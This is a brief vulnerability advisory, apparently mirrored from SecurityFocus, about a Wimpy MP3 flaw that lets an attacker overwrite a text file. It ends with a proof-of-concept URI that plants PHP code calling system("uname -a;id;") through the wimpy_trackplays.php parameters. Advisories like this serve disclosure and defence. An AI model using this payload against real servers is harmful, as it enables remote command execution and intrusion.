8 lines
No EOL
454 B
Text
Executable file
8 lines
No EOL
454 B
Text
Executable file
source: http://www.securityfocus.com/bid/16696/info
|
|
|
|
Wimpy MP3 is prone to a weakness that permits the overwriting of a text file with arbitrary attacker-supplied data.
|
|
|
|
Successful exploitation of this issue may aid an attacker in further attacks.
|
|
|
|
The following proof of concept URI is available:
|
|
http://www.example.com/pathtowimpy/goodies/wimpy_trackplays.php?myAction=trackplays&trackFile=<?php&trackArtist=system("uname -a;id;");&trackTitle=?> |